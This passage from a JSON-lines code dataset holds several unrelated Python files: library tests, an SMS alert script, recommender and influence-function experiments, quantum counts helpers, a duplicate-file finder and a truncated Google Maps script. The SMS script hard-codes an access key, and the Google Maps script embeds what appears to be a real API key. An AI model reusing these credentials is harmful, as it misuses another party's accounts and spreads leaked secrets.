f:\n if type(want) is str:\n eq_ok(f.read(), want, name)\n else:\n eq_ok(json.load(f), want, name)\n except Exception as e:\n ok(False, \"{} ({}: {})\".format(name, e.__class__.__name__, e))\n\n\ndef derivelanguage(deriver, language, **kwargs):\n if language == \"Java\":\n raise ValueError(\"Blech\")\n return language\n\n\nreset()\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback=derivelanguage,\n getvalue=\"key\"),\n \"empty input runs ok\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {}}, \"...new, empty dump is created\")\n\n\nreset()\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback =derivelanguage,\n getvalue =\"language\",\n entirerepo=True),\n \"simple language derivation over entire repo\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {\"java\" : \"Blech\"}},\n \"...dump is modified with exceptions raised in callback\")\n\nfor lang in [\"perl\", \"python\"]:\n cap = lang.capitalize()\n file_ok(targets, lang + \".lang\", cap,\n \"...{} derives to {}\".format(lang, cap))\n\nfor lang in [\"java\", \"other\"]:\n ok(not os.path.exists(os.path.join(targets, lang + \".lang\")),\n \"...{} is not derived\".format(lang))\n\n\nwith open(os.path.join(targets, \"other.matches.json\"), \"w\") as f:\n json.dump([{\"metadata\" : {\"language\" : \"Other\"}}], f)\nwith open(os.path.join(targets, \"perl.matches.json\"), \"w\") as f:\n json.dump([{\"metadata\" : {\"language\" : \"Perl 5\"}}], f)\n\nreset(\"D \" + os.path.join(repo, \"java\"),\n \"D \" + os.path.join(repo, \"python\"),\n \"M \" + os.path.join(targets, \"other.matches.json\"))\n\nlives_ok(lambda: derive(suffix =\".lang\",\n dump =os.path.join(tmp, \"lang.json\"),\n callback =derivelanguage,\n getvalue =\"language\"),\n \"language derivation with diff input\")\n\nfile_ok(tmp, \"lang.json\", {\"problems\" : {}}, \"...dump is modified correctly\")\n\nfile_ok(targets, \"perl.lang\", \"Perl\", \"...file not in diff is not touched\")\nfile_ok(targets, \"other.lang\", \"Other\", \"...modified file is re-derived\")\n\nok(not os.path.exists(os.path.join(targets, \"python.lang\")),\n \"...python.lang is deleted as per diff\")\nok(not os.path.exists(os.path.join(targets, \"java.lang\")),\n \"...java.lang is still not derived\")\n\n\ndef oninit(deriver):\n deriver.dump[\"handled\"] = set(deriver.dump.get(\"handled\", []))\n\ndef ondump(deriver):\n deriver.dump[\"handled\"] = sorted(list(deriver.dump[\"handled\"]))\n\ndef getmore(deriver, resources, **kwargs):\n return {\n \"meta\" : resources[0][0][\"metadata\"],\n \"lang\" : os.path.basename(resources[1]),\n }\n\ndef derivemore(deriver, value, relative, **kwargs):\n deriver.dump[\"handled\"].add(relative)\n return (value, None if value[\"lang\"] == \"other.lang\" else value[\"lang\"])\n\n\nreset()\nlives_ok(lambda: derive(suffix =[\".lang.json\", \".more\"],\n resources =[Json(\".matches.json\"), File(\".lang\")],\n oninit =oninit,\n ondump =ondump,\n dump =os.path.join(tmp, \"more.json\"),\n getvalue =getmore,\n callback =derivemore,\n entirerepo=True),\n \"derivation with all bells and whistles\")\n\nfile_ok(tmp, \"more.json\", {\n \"handled\" : [\"other\", \"perl\"],\n \"problems\" : {},\n }, \"...dump result is correct\")\n\nfile_ok(targets, \"perl.lang.json\", {\n \"lang\" : \"perl.lang\",\n \"meta\" : {\"language\" : \"Perl 5\"},\n }, \"...perl.lang.json derived correctly\")\n\nfile_ok(targets, \"perl.more\", \"perl.lang\",\n \"...perl.more derived correctly\")\n\nfile_ok(targets, \"other.lang.json\", {\n \"lang\" : \"other.lang\",\n \"meta\" : {\"language\" : \"Other\"},\n }, \"...other.lang.json derived correctly\")\n\nok(not os.path.exists(os.path.join(targets, \"other.more\")),\n \"...returning None does not derive file\")\n\n\nreset(\"M \" + os.path.join(targets, \"other.lang\"))\n\nex = getexcept(lambda: derive(suffix =[\".lang.json\", \".more\"],\n resources =[Json(\".matches.json\"), File(\".lang\")],\n oninit =oninit,\n ondump =ondump,\n dump =os.path.join(tmp, \"more.json\"),\n getvalue =getmore,\n callback =lambda *args, **kwargs: \"wrong\"))\nis_ok(type(ex), SystemExit, \"wrong tuple size from callback raises SystemExit\")\n","sub_path":"101worker/libraries/meta101/t/21_derive.t.py","file_name":"21_derive.t.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"444453019","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib2\nimport json\nimport os\nimport logging\nfrom collections import OrderedDict\n\ndcei_home = os.getenv('SPLUNK_HOME', '/opt/dcei')\nlog_file = os.path.join(\n dcei_home,\n 'etc/apps/dce_monitor/bin/scripts/alert_sms.log')\n\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s -%(module)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S %p',\n filename=log_file,\n filemode=\"a\"\n)\n\n\ndef get_objs(kw, data=None, method=None):\n url = 'http://message.example.com/v1{:s}'.format(kw)\n req = urllib2.Request('{:s}'.format(url), data=data)\n req.add_header('Content-type', 'application/json;charset=utf-8')\n if method:\n req.get_method = lambda: method\n try:\n objs = json.loads(urllib2.urlopen(req).read())\n return objs\n except urllib2.URLError:\n return\n except:\n pass\n\n\ndef main():\n param_dict = globals().get('param_dict', dict())\n custom_param = dict(i.split('=')\n for i in param_dict['configuration']\n ['custom_param'].split())\n if param_dict:\n for tel in custom_param.get('TEL').split(','):\n message = param_dict['configuration']['name']\n message_detail = param_dict['result'].get('target', 'target')\n params = OrderedDict(\n [(\"zone\", custom_param.get('DC', '#')),\n (\"message\", message),\n (\"message_detail\", message_detail),\n (\"reservation\", \",请及时处理\")])\n data = json.dumps({\"accessKey\": \"2014420564\",\n \"receiver\": tel,\n \"tempId\": \"10759157\",\n \"params\": params\n })\n meta = get_objs('/sms/sendsms', data, 'POST')\n logging.info(\n '\"{} {}\" sent to {} {}'.format(\n message, message_detail, tel, meta.get(\n 'result', 'success')))\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n logging.error(e)\n","sub_path":"work/daocloud/alert_sms.py","file_name":"alert_sms.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"512542504","text":"from pymongo import MongoClient\nimport numpy as np\nfrom collections import Counter, defaultdict\nfrom pyltr.metrics._metrics import check_qids, get_groups\nfrom scipy import stats\n\n# metrics are computed session-wise\n\ndef p_at_k(results,k=5):\n\n feedback = [i['feedback'] for i in results]\n\n return sum(feedback)/k\n\ndef ser_at_k(results, most_pop_dict, k=5):\n\n most_pop_k = sorted(most_pop_dict.keys(), key=lambda x: most_pop_dict[x], reverse=True)[0:k]\n\n feedback = []\n\n for i in results:\n\n if i['uri'] in most_pop_k:\n\n feedback.append(0)\n\n else:\n feedback.append(i['feedback'])\n\n return sum(feedback)/k\n\ndef nov_at_k(results, most_pop_dict, k=5):\n\n uris = [i['uri'] for i in results]\n\n novelties = [-np.log2(most_pop_dict[i]) for i in uris]\n\n return sum(novelties)/k\n\n# define popularity dictionary\n\ndataset = 'LibraryThing'\n\npop_dict = Counter()\n\nwith open('datasets/'+dataset+'/all.dat') as all_ratings:\n\n for line in all_ratings:\n \n line_split = line.strip('\\n').split(' ')\n\n item = line_split[1]\n\n pop_dict[item]+=1\n\n# normalization\n\ntot_pop = sum(pop_dict.values())\n\nfor item, pop in pop_dict.items():\n\n pop_dict[item] = pop/tot_pop\n\n# connect to DB\n\nmongodb_port = 27027\n\nclient = MongoClient('localhost', mongodb_port)\n\nentity2rec = client.entity2rec\n\nseed = entity2rec.seed\nfeedback = entity2rec.feedback\ndiscard = entity2rec.discard\n\n# query the DB\n\nfeedback_entity2rec = []\nfeedback_itemknn = []\n\nqids_entity2rec = []\nqids_itemknn = []\n\nfor post in feedback.find({\"algorithm\": \"entity2rec\"}):\n\n qids_entity2rec.append(post['user_id'])\n\n feedback_entity2rec.append(post)\n\nfor post in feedback.find({\"algorithm\": \"itemknn\"}):\n\n qids_itemknn.append(post['user_id'])\n\n feedback_itemknn.append(post)\n\n# get user_id - seed mapping\n\nseed_user_entity2rec = {}\nseed_user_itemknn = {}\n\nfor post in seed.find(): # every user_id - seed pair\n \n user_id = post['user_id']\n\n if user_id in qids_entity2rec:\n print('user %s has received entity2rec' %user_id)\n seed_user_entity2rec[user_id] = post['seed']\n\n elif user_id in qids_itemknn:\n print('user %s has received itemknn' %user_id)\n seed_user_itemknn[user_id] = post['seed']\n\n else:\n print('user %s has not rated recommendations' %user_id)\n continue\n \n# entity2rec scores\n\nquery_groups_entity2rec = get_groups(qids_entity2rec)\n\nnum_sessions_entity2rec = len(seed_user_entity2rec)\n\nentity2rec_scores = defaultdict(list)\n\nentity2rec_precision_by_popularity = defaultdict(list)\n\nentity2rec_serendipity_by_popularity = defaultdict(list)\n\nentity2rec_novelty_by_popularity_entity2rec = defaultdict(list)\n\nfor qid, a, b in query_groups_entity2rec: # iterate through the different sessions\n\n entity2rec_scores['precision'].append(p_at_k(feedback_entity2rec[a:b]))\n entity2rec_scores['serendipity'].append(ser_at_k(feedback_entity2rec[a:b], pop_dict))\n entity2rec_scores['novelty'].append(nov_at_k(feedback_entity2rec[a:b], pop_dict))\n\n try:\n seed = seed_user_entity2rec[qid]\n\n seed_pop = pop_dict[seed]\n\n entity2rec_precision_by_popularity[seed_pop].append(p_at_k(feedback_entity2rec[a:b]))\n\n entity2rec_serendipity_by_popularity[seed_pop].append(ser_at_k(feedback_entity2rec[a:b], pop_dict))\n\n entity2rec_novelty_by_popularity_entity2rec[seed_pop].append(nov_at_k(feedback_entity2rec[a:b], pop_dict))\n\n except KeyError:\n continue\n\nprint('entity2rec: P@5 ', np.mean(entity2rec_scores['precision']), '+-', np.std(entity2rec_scores['precision']/np.sqrt(num_sessions_entity2rec)))\nprint('entity2rec: SER@5 ', np.mean(entity2rec_scores['serendipity']), '+-', np.std(entity2rec_scores['serendipity']/np.sqrt(num_sessions_entity2rec)))\nprint('entity2rec: NOV@5 ', np.mean(entity2rec_scores['novelty']), '+-', np.std(entity2rec_scores['novelty']/np.sqrt(num_sessions_entity2rec)))\n\n# itemknn scores\n\nquery_groups_itemknn = get_groups(qids_itemknn)\n\nnum_sessions_itemknn = len(seed_user_entity2rec)\n\nitemknn_scores = defaultdict(list)\n\nitemknn_precision_by_popularity = defaultdict(list)\n\nitemknn_serendipity_by_popularity = defaultdict(list)\n\nitemknn_novelty_by_popularity_entity2rec = defaultdict(list)\n\nfor qid, a, b in query_groups_itemknn:\n\n itemknn_scores['precision'].append(p_at_k(feedback_itemknn[a:b]))\n itemknn_scores['serendipity'].append(ser_at_k(feedback_itemknn[a:b], pop_dict))\n itemknn_scores['novelty'].append(nov_at_k(feedback_itemknn[a:b], pop_dict))\n\n try:\n seed = seed_user_itemknn[qid]\n\n seed_pop = pop_dict[seed]\n\n itemknn_precision_by_popularity[seed_pop].append(p_at_k(feedback_entity2rec[a:b]))\n\n itemknn_serendipity_by_popularity[seed_pop].append(ser_at_k(feedback_entity2rec[a:b], pop_dict))\n\n itemknn_novelty_by_popularity_entity2rec[seed_pop].append(nov_at_k(feedback_entity2rec[a:b], pop_dict))\n\n except KeyError:\n continue\n\nprint('itemknn: P@5 ', np.mean(itemknn_scores['precision']), '+-', np.std(itemknn_scores['precision'])/np.sqrt(num_sessions_itemknn))\nprint('itemknn: SER@5 ', np.mean(itemknn_scores['serendipity']), '+-', np.std(itemknn_scores['serendipity'])/np.sqrt(num_sessions_itemknn))\nprint('itemknn: NOV@5 ', np.mean(itemknn_scores['novelty']), '+-', np.std(itemknn_scores['novelty'])/np.sqrt(num_sessions_itemknn))\n\n# Welch's t-student test\n\nprint('T-test precision:')\nprint(stats.ttest_ind(entity2rec_scores['precision'],itemknn_scores['precision'], equal_var=False))\n\nprint('T-test serendipity:')\nprint(stats.ttest_ind(entity2rec_scores['serendipity'],itemknn_scores['serendipity'], equal_var=False))\n\nprint('T-test novelty:')\nprint(stats.ttest_ind(entity2rec_scores['novelty'],itemknn_scores['novelty'], equal_var=False))\n\n# plot scores as a function of seed popularity\n\nwith open('plots/entity2rec_precision_by_popularity.csv', 'w') as entity2rec_precision_by_popularity_file:\n\n for pop, precisions in entity2rec_precision_by_popularity.items():\n\n p = np.mean(precisions)\n\n entity2rec_precision_by_popularity_file.write(\"%.6f,%.6f\\n\" %(pop,p))\n\n\nwith open('plots/itemknn_precision_by_popularity.csv', 'w') as itemknn_precision_by_popularity_file:\n\n for pop, precisions in itemknn_precision_by_popularity.items():\n\n p = np.mean(precisions)\n\n itemknn_precision_by_popularity_file.write(\"%.6f,%.6f\\n\" %(pop,p))","sub_path":"scripts/tinderbook_data_analysis.py","file_name":"tinderbook_data_analysis.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"517904151","text":"def scan(words):\n directions = [\"north\",\"south\",\"east\",\"west\",\"up\",\"down\",\"right\",\"left\"]\n verbs = [\"go\",\"stop\",\"kill\",\"eat\"]\n stop = [\"the\",\"in\",\"of\",\"from\",\"at\",\"it\"]\n nouns = [\"door\",\"bear\",\"princess\",\"cabinet\"]\n \n wordlist = words.split()\n \n output = []\n\n for word in wordlist:\n if(word.lower() in directions):\n output.append((\"direction\",word))\n elif(word.lower() in verbs):\n output.append((\"verb\",word))\n elif(word.lower() in stop):\n output.append((\"stop\",word))\n elif(word.lower() in nouns):\n output.append((\"noun\",word))\n elif(word.isdigit()):\n output.append((\"number\",int(word)))\n else:\n output.append((\"error\",word))\n \n return output\n","sub_path":"skeleton_ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"227548646","text":"import types\nimport warnings\n\nimport numpy as np\nfrom scipy.stats import norm\n\nfrom util import constants as cs\n\n\nclass Parameters(types.SimpleNamespace):\n def __init__(self):\n super().__init__()\n\n def add_ndarray(self, param_nparray):\n self.param_counter = 0\n add_returns_to_tenure(self, param_nparray)\n add_search_params(self, param_nparray)\n add_occupation_chars(self, param_nparray)\n add_skill_types(self, param_nparray)\n add_hc_accumulation_rates(self, param_nparray)\n\n def asarray(self):\n listarray = []\n listarray.extend(self.returns_to_tenure)\n listarray.extend(self.search_params)\n listarray.extend(self.occupation_chars)\n listarray.extend(self.skill_types)\n listarray.extend(self.hc_accumulation_rates)\n return np.array(listarray)\n\n\ndef gen_initial_point():\n param0 = Parameters()\n lowerbounds = []\n upperbounds = []\n\n\n returns_to_tenure = np.array([.02, .02, .02])\n lowerbounds.extend([0] * 3)\n upperbounds.extend([.04] * 3)\n param0.param_counter = 0\n add_returns_to_tenure(param0, returns_to_tenure)\n\n\n search_params = np.array([.5, .4, .04,\n 1,1,1,1,1,1,1,1,1])\n lowerbounds.extend([.3, .2, 0] + [0.01] * 9)\n upperbounds.extend([.7,.6,.07] + [10] * 9)\n param0.param_counter = 0\n add_search_params(param0, search_params)\n\n\n gamma_frontier_curvature = 0.79981681\n lowerbounds.append(.5)\n upperbounds.append(2.0)\n\n g_angles = [0.84697507, 0.77712276, 0.91647835, 0.80430491,\n 0.82980593, 0.8585234, 0.89489879]\n lowerbounds.extend([.05] * 7)\n upperbounds.extend([np.pi/2 - .05] * 7)\n\n mincer_gamma = [0.09522364,\n 0.10771799, 0.14672799, 0.36515768, 0.43312207,\n 0.57878077, 0.59999937]\n lowerbounds.extend([0] * 7)\n upperbounds.extend([.6] * 7)\n param0.param_counter = 0\n occupation_chars = np.array([gamma_frontier_curvature] + g_angles + mincer_gamma)\n add_occupation_chars(param0, occupation_chars)\n\n skill_means = [1.0, 1.0]\n skill_sds = [.3, .3]\n skill_corrs = [0.0]\n skill_type_params = np.array(skill_means + skill_sds + skill_corrs)\n lowerbounds.extend([.5, .5, .05, .05, -.5])\n upperbounds.extend([1.5, 1.5, 1, 1, .5])\n param0.param_counter = 0\n add_skill_types(param0, skill_type_params)\n\n\n hc_accumulation_rates = np.array([.1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1,\n .1, 1])\n lowerbounds.extend([0,.5] * 9)\n upperbounds.extend([.4, 1] * 9)\n param0.param_counter = 0\n add_hc_accumulation_rates(param0, hc_accumulation_rates)\n\n lowerbounds = np.array(lowerbounds, dtype=np.float64)\n upperbounds = np.array(upperbounds, dtype=np.float64)\n x0 = param0.asarray()\n\n for i in range(len(lowerbounds)):\n assert lowerbounds[i] <= x0[i] <= upperbounds[i]\n\n return lowerbounds, upperbounds, x0\n\n\ndef transform_array_to_paramstype(parameter_nparray):\n np.random.seed(126)\n parameter_paramtype = Parameters()\n parameter_paramtype.add_ndarray(parameter_nparray)\n return parameter_paramtype\n\n\ndef add_returns_to_tenure(self, param_nparray):\n i = self.param_counter\n self.beta0 = param_nparray[i]\n self.ften0 = param_nparray[i+1]\n self.oten0 = param_nparray[i+2]\n self.returns_to_tenure = [self.beta0, self.ften0, self.oten0]\n self.param_counter += len(self.returns_to_tenure)\n\ndef add_search_params(self, param_nparray):\n i = self.param_counter\n self.lambda_e = param_nparray[i]\n self.lambda_u = param_nparray[i+1]\n self.fire_rate = param_nparray[i+2]\n self.offer_probs = param_nparray[(i+3):(i + 3 + cs.NJOBS)]\n self.offer_probs = self.offer_probs/np.sum(self.offer_probs)\n self.search_params = [self.lambda_e, self.lambda_u, self.fire_rate] + list(self.offer_probs)\n self.param_counter += len(self.search_params)\n\ndef add_occupation_chars(self, param_nparray):\n i = self.param_counter\n gamma_frontier_curvature = param_nparray[i]\n g_angles = param_nparray[(i+1):(i+8)]\n fixed_gamma = transform_fixed_gangles_to_gammas(g_angles, gamma_frontier_curvature)\n self.fixed_gamma = fixed_gamma\n base_mincer = param_nparray[(i+8):(i+15)]\n self.mincer_gamma = generate_mincer_gammas(base_mincer)\n self.occupation_chars = [gamma_frontier_curvature] + list(g_angles) + list(base_mincer)\n self.param_counter += len(self.occupation_chars)\n\ndef generate_mincer_gammas(gammas):\n mincer_gamma = np.ones((cs.N_TRANS_DIM,\n cs.NJOBS - 2))\n mincer_gamma[0, :] = gammas\n mincer_gamma[1, :] = 1 - gammas\n mincer_gamma = np.insert(mincer_gamma, 1,\n np.array([[1.0, 0.0]]), axis=1)\n mincer_gamma = np.insert(mincer_gamma, 6,\n np.array([[0.0, 1.0]]), axis=1)\n return mincer_gamma\n\n\ndef transform_fixed_gangles_to_gammas(g_angles, gamma_frontier_curvature):\n fixed_gamma = np.zeros((2, 7))\n with warnings.catch_warnings():\n warnings.filterwarnings('error')\n try:\n fixed_gamma[0, :] = (1 + np.tan(g_angles) ** gamma_frontier_curvature) ** (-1 / gamma_frontier_curvature)\n fixed_gamma[1, :] = (1 - fixed_gamma[0, :] ** gamma_frontier_curvature) ** (1 / gamma_frontier_curvature)\n fixed_gamma = np.insert(fixed_gamma, 1,\n np.array([[1.0, 0.0]]), axis=1)\n fixed_gamma = np.insert(fixed_gamma, 6,\n np.array([[0.0, 1.0]]), axis=1)\n except Warning as e:\n print('Error in transform_fixed_gangles_to_gammas:', e)\n print(g_angles, gamma_frontier_curvature)\n raise\n return fixed_gamma\n\n\ndef add_skill_types(self, param_nparray):\n i = self.param_counter\n fixed_theta_mean = param_nparray[i:(i+cs.N_FIXED_DIM)]\n fixed_theta_sd = param_nparray[(i+cs.N_FIXED_DIM):(i+ 2 * cs.N_FIXED_DIM)]\n fixed_theta_corr = param_nparray[(i+ 2 * cs.N_FIXED_DIM)\n :(i+ 2 * cs.N_FIXED_DIM + int(cs.N_FIXED_DIM * (cs.N_FIXED_DIM - 1)/2))]\n self.thetatypes = get_fixed_skill_point_list(fixed_theta_mean, fixed_theta_sd, fixed_theta_corr)\n self.skill_types = list(fixed_theta_mean) + list(fixed_theta_sd) + list(fixed_theta_corr)\n self.param_counter += len(self.skill_types)\n\ndef get_fixed_skill_point_list(fixed_theta_mean, fixed_theta_sd, fixed_theta_corr):\n unrotated_skills = generate_unrotated_skill_points(fixed_theta_mean, fixed_theta_sd)\n thetatypes = rotate_skills(unrotated_skills, fixed_theta_corr)\n return thetatypes\n\n\ndef generate_unrotated_skill_points(fixed_theta_mean, fixed_theta_sd):\n\n numpts = int(np.sqrt(cs.N_INIT_PTS))\n # this will not generate the expected number of points unless\n # N_INIT_PTS is a perfect square\n\n quants = np.linspace(0, 1, numpts + 2)[1:-1]\n unrotated_skill0 = norm.ppf(quants, loc=fixed_theta_mean[0], scale=fixed_theta_sd[0])\n unrotated_skill1 = norm.ppf(quants, loc=fixed_theta_mean[1], scale=fixed_theta_sd[1])\n unrotated_skills = np.array([[t0, t1] for t0 in unrotated_skill0\n for t1 in unrotated_skill1])\n return unrotated_skills\n\n\ndef rotate_skills(thetatypes, correlation):\n rotated = thetatypes @ np.array([[1.0, correlation],\n [correlation, 1.0]])\n return rotated\n\n\ndef add_hc_accumulation_rates(self, param_ndarray):\n i = self.param_counter\n self.mincer_rates = param_ndarray[i:(i + 2* cs.NJOBS)]\n self.mincer_rates = np.reshape(self.mincer_rates, (cs.NJOBS, 2))\n self.hc_accumulation_rates = list(self.mincer_rates.ravel())\n self.param_counter += len(self.hc_accumulation_rates)\n","sub_path":"util/param_type.py","file_name":"param_type.py","file_ext":"py","file_size_in_byte":8057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"375172172","text":"from typing import Union, List\nfrom .statistics import mean, sem\n\n\ndef separate_multi_counts(counts: dict) -> List[dict]:\n \"\"\"Separate the distribution counts of multiple qc combined circuit\n\n Args:\n counts (dictionary): counts distribution of result of multi-programming\n\n Returns:\n List[dictionary]: list of each counts distribution of quantum computation\n \"\"\"\n keys = list(counts.keys())\n num_clbits = [len(clbit) for clbit in keys[0].split()]\n\n # partial complete bitstrings\n keys_each = [bitstrings(_clbits) for _clbits in num_clbits]\n\n # separate counts\n pointer = 0\n separated_counts = []\n for p_clbit_list, num_p_clbit in zip(keys_each, num_clbits):\n p_counts = {}\n for p_clbit in p_clbit_list:\n p_counts[p_clbit] = 0\n for bitstr, value in counts.items():\n if bitstr[pointer : pointer + num_p_clbit] == p_clbit:\n p_counts[p_clbit] += value\n separated_counts.append(p_counts)\n pointer += num_p_clbit + 1\n\n return separated_counts, num_clbits\n\n\ndef mean_counts_distribution(counts_list):\n \"\"\"Take multiple distribution then return its mean\n\n Args:\n counts_list (List[dictionary]): list of counts distribution of result of quantum computation\n\n Returns:\n dictrionary: counts distribution composed by mean of each value in counts distribution\n \"\"\"\n counts_mean = {}\n\n _keys = list(counts_list.keys())\n num_clbit = len(_keys[0])\n\n bitstr_keys = bitstrings(num_clbit)\n for bitstr in bitstr_keys:\n values = []\n for counts in counts_list:\n try:\n values.append(counts[bitstr])\n except:\n values.append(0)\n counts_mean[bitstr] = mean(values)\n return counts_mean\n\n\ndef sem_counts_distribution(counts_list):\n \"\"\"Take multiple distributions then return distribution composed each standard error of the mean.\n\n Args:\n counts_list (List[dictionary]): list of counts distribution of result of quantum computation\n\n Returns:\n dictrionary: counts distribution composed by sem of each value in counts distribution\n \"\"\"\n counts_sem = {}\n\n _keys = list(counts_list.keys())\n num_clbit = len(_keys[0])\n\n bitstr_keys = bitstrings(num_clbit)\n for bitstr in bitstr_keys:\n values = []\n for counts in counts_list:\n try:\n values.append(counts[bitstr])\n except:\n values.append(0)\n counts_sem[bitstr] = sem(values)\n return counts_sem\n\n\ndef bitstrings(num_clbits: Union[int, List[int]]):\n \"\"\"Return ordered count keys.\"\"\"\n if isinstance(num_clbits, int):\n return [bin(j)[2:].zfill(num_clbits) for j in range(2 ** num_clbits)]\n\n elif isinstance(num_clbits, list):\n sum_clbits = int(sum(num_clbits))\n _bitstrings = [bin(j)[2:].zfill(sum_clbits) for j in range(2 ** sum_clbits)]\n spaced_bitstrings = []\n for bits in _bitstrings:\n counter = 0\n spaced_bits = \"\"\n bits = str(bits)\n for num_bits_in_reg in num_clbits:\n end = counter + num_bits_in_reg\n reg_bits = bits[counter:end]\n spaced_bits += reg_bits\n if num_bits_in_reg == num_clbits[-1]:\n break\n spaced_bits += \" \"\n counter += end\n spaced_bitstrings.append(spaced_bits)\n return spaced_bitstrings\n","sub_path":"utils/process_counts_distribution.py","file_name":"process_counts_distribution.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"30409539","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport numpy as np\nimport pandas as pd\n\nimport IPython\nimport tensorflow as tf\n\nfrom influence.logisticRegressionWithLBFGS import LogisticRegressionWithLBFGS\nfrom influence.binaryLogisticRegressionWithLBFGS import BinaryLogisticRegressionWithLBFGS\nimport influence.experiments as experiments\n\nfrom scripts.load_animals import load_animals\nfrom scripts.load_mnist import load_mnist\n\n\ndata_sets = load_animals(num_train_ex_per_class=300,\n num_test_ex_per_class=100,\n classes=['dog', 'fish'])\n# size: 299x299x3\n\n\n\n\nnum_classes = 2\n\ninput_dim = data_sets.train.x.shape[1]\nweight_decay = 0.01\nbatch_size = 1400\ninitial_learning_rate = 0.001\nkeep_probs = None\nmax_lbfgs_iter = 5000\ndecay_epochs = [1000, 10000]\nnum_to_remove = 50\nremove_type = 'neginf'\n\ntf.reset_default_graph()\n\n\ntf_model = BinaryLogisticRegressionWithLBFGS(\n input_dim=input_dim,\n weight_decay=weight_decay,\n max_lbfgs_iter=max_lbfgs_iter,\n num_classes=num_classes,\n batch_size=batch_size,\n data_sets=data_sets,\n initial_learning_rate=initial_learning_rate,\n keep_probs=keep_probs,\n decay_epochs=decay_epochs,\n mini_batch=False,\n train_dir='output',\n log_dir='log',\n model_name='mnist_logreg_lbfgs',\n num_to_remove=num_to_remove)\n\ntf_model.train()\n\ntest_idx = 8\nactual_loss_diffs, predicted_loss_diffs_cg, indices_to_remove = experiments.test_retraining(\n tf_model,\n test_idx=test_idx,\n iter_to_load=0,\n force_refresh=False,\n num_to_remove=num_to_remove,\n remove_type=remove_type,\n random_seed=0,\n approx_type='lissa',\n approx_params={'batch_size':1}\n)\n# #\n# experiments.viz_top_influential_examples(tf_model, [123], 20)\n# LiSSA\nnp.random.seed(17)\npredicted_loss_diffs_lissa = tf_model.get_influence_on_test_loss(\n [test_idx],\n indices_to_remove,\n approx_type='lissa',\n approx_params={'scale':25,\n 'recursion_depth':5000,\n 'damping':0,\n 'batch_size':1,\n 'num_samples':10},\n force_refresh=True\n)\n\nnp.savez(\n 'output/mnist_logreg_lbfgs_retraining-500.npz',\n actual_loss_diffs=actual_loss_diffs,\n predicted_loss_diffs_cg=predicted_loss_diffs_cg,\n predicted_loss_diffs_lissa=predicted_loss_diffs_lissa,\n indices_to_remove=indices_to_remove\n )","sub_path":"scripts/train_animal_logreg.py","file_name":"train_animal_logreg.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"551919546","text":"#!/usr/bin/env python\n\nimport sys\nimport time\n\nimport scrollphat\n\n\nscrollphat.set_brightness(2)\n\nif len(sys.argv) != 2:\n print(\"\\nusage: python simple-text-scroll.py \\\"message\\\" \\npress CTRL-C to exit\\n\")\n sys.exit(0)\n\nscrollphat.write_string(sys.argv[1], 11)\nlength = scrollphat.buffer_len()\n\nfor i in range(length):\n try:\n scrollphat.scroll()\n time.sleep(0.1)\n except KeyboardInterrupt:\n scrollphat.clear()\n sys.exit(-1)\n","sub_path":"examples/scroll-text-once.py","file_name":"scroll-text-once.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"652511239","text":"import sys\n\nimport os\n\nimport hashlib\n\n\ndef encoded_file(file):\n code = \"\"\n with open(file, 'r') as f:\n data = f.read()\n code = hashlib.md5(data.encode()).hexdigest()\n return code\n\ndef get_size(file):\n file_stats = os.stat(file)\n return file_stats.st_size\n\n\n\ndef repchecker(dir_name):\n list_of_files = []\n hash_list = []\n flag = 0\n print(\"------------------------------------\")\n for root, dirs, files in os.walk(\".\", topdown=True):\n for name in files:\n list_of_files.append(os.path.join(root, name))\n hash_list.append(encoded_file(os.path.join(root, name)))\n\n length = len(hash_list)\n i = 0\n while i < length:\n flag = 0\n j = i + 1\n while j < length:\n if hash_list[i] == hash_list[j]:\n if get_size(list_of_files[i]) == get_size(list_of_files[j]):\n if flag == 0: \n print(list_of_files[i])\n print(list_of_files[j])\n list_of_files.pop(j)\n hash_list.pop(j)\n flag = 1\n length -= 1\n j -= 1 # zapobiega utracie danych przy przesuwaniu indeksu\n j += 1\n if flag == 1:\n print(\"------------------------------------\")\n i += 1\n\n\ndef main():\n dir_name = sys.argv[1]\n if os.path.isdir(dir_name):\n if dir_name == \"./\":\n path = os.getcwd()\n path += '/'\n repchecker(path)\n else:\n repchecker(dir_name + '/')\n else:\n print(\"That's not directory!\")\n\n\nmain()\n","sub_path":"lista2/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"166194004","text":"import googlemaps\nimport pandas as pd\nimport time\n\ngmaps = googlemaps.Client(key='AIzaSyC7lSKqhxhVwRAWY-SMJCStIsh2mrbxKKc')\n\ncities=[\"Niagara 